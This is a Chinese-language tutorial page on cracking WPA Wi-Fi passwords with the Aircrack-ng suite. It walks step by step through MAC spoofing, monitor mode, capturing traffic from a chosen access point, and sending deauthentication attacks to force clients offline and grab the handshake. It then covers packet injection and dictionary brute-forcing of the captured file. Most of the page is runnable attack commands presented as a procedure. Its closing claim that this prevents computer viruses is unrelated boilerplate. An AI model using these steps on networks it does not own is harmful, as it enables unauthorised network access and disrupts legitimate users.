明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

無線網(wǎng)攻防Aircrack -ng(抓包方式)

[摘要]1.修改mac地址信息。 ifconfig wlan0 down macchange -A wlan0 ifconfig wlan0 up2.監(jiān)聽 ai...

無線網(wǎng)攻防Aircrack -ng(抓包方式)

1.修改mac地址信息。

    ifconfig wlan0 down

     macchange -A wlan0

    ifconfig wlan0 up

2.監(jiān)聽

    airmon-ng start wlan0

3.抓包

    airodump-ng  mon0

    airodump-ng—w dota -c 10【信道】 - -bssid 5A-1F-CC-B1-A1:25 mon0(ctrl+c退出, 保留終端或者-w dota從而保存握手包c(diǎn)ap,如果想針對(duì)某個(gè)客戶端就加個(gè) -c 客戶端)

備注:airodump界面介紹:

    BSSID:ap的mac地址。

    PWR:信號(hào)強(qiáng)度, 如果PWR是-1說明網(wǎng)卡的驅(qū)動(dòng)不支持報(bào)告信號(hào)水平。 如果是部分客戶端的PWR為-1, 那么說明該客戶端不在你網(wǎng)卡能監(jiān)聽到的范圍內(nèi), 但是你能捕捉到AP發(fā)往該客戶端的數(shù)據(jù)。

    BeaconsAP發(fā)出的通告編號(hào), 每個(gè)接入點(diǎn)(AP)在最低速率(1M)時(shí)差不多每秒會(huì)發(fā)送10個(gè)左右的beacon, 所以它們能在很遠(yuǎn)的地方就被發(fā)現(xiàn)。

    #Data被捕獲到的數(shù)據(jù)分組的數(shù)量(如果是WEP, 則代表唯一IV的數(shù)量), 包括廣播分組。

    #/s過去10秒鐘內(nèi)每秒捕獲數(shù)據(jù)分組的數(shù)量

    STATION:ap上面連接的用戶。

    CH:信道

4.Deauth驗(yàn)證攻擊:aireplay-ng -0 10 -a<ap mac> -c <ap對(duì)應(yīng)的客戶端mac> mon0【通過觀察airmon-ng start mon0右上角查看握手包是否捕獲到了。 如果不用-c那么所有的ap下客戶端都掉線, 都被攻擊。 】

參數(shù)解釋:-0指的是采取Deautenticate攻擊方式, 后面為發(fā)送次數(shù);

                  -a ap mac

                  -c 客戶端mac

注意:Deauth攻擊往往并不是一次攻擊就成功, 為確保成功截獲需要反復(fù)進(jìn)行(WPA破解不用等到數(shù)據(jù)Data達(dá)到幾萬, 因?yàn)樗灰粋(gè)包含WPA4次握手驗(yàn)證包就可以了, 還有最好每操作一步新建一個(gè)窗口, 方便攻擊時(shí)候查看數(shù)據(jù)情況從而確定握手包是否抓取成功。 )

deauth原理:強(qiáng)制讓合法無線客戶端與AP被斷開, 當(dāng)它被從WLAN 中斷開后, 這個(gè)無線客戶端會(huì)自動(dòng)嘗試重新連接到AP上, 在這個(gè)重新連接過程中, 數(shù)據(jù)通信就產(chǎn)生了, 然后利用airodump捕獲一個(gè)無線路由器與無線客戶端四次握手的過程, 生成一個(gè)包含四次握手的cap包。 然后再利用字典進(jìn)行暴力。 如果deauth攻擊不行, 或者沒客戶端沒流量情況下, 可以通過注入攻擊。

aireplay-ng -3 b ap mac -h 個(gè)人網(wǎng)卡地址 mon。

5.跑字典

aircrack-ng -w password.txt dota-*.cap(防止有時(shí)候-w記錄不全, cap包用正則表達(dá)式方式引用最好。 )

備注:密碼字典的生成最好是不同的類型的字典放在一個(gè)txt, 或者根據(jù)特性歸類成不同的txt, 這樣破解時(shí)候方便。


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。